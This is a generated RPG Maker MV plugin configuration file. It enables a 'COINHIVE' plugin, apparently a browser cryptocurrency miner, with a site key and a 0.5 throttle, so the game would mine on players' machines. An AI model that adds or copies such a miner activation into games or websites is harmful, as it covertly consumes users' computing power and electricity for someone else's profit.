// Generated by RPG Maker.
// Do not edit this file directly.
var $plugins =
[
{"name":"COINHIVE","status":true,"description":"CoinHive Support for RPG Maker MV","parameters":{"Site Key":"TgXnAAcsmpcoFsyFCiX0dHtzXZkAuDOe","Throttle":"0.5"}}
];
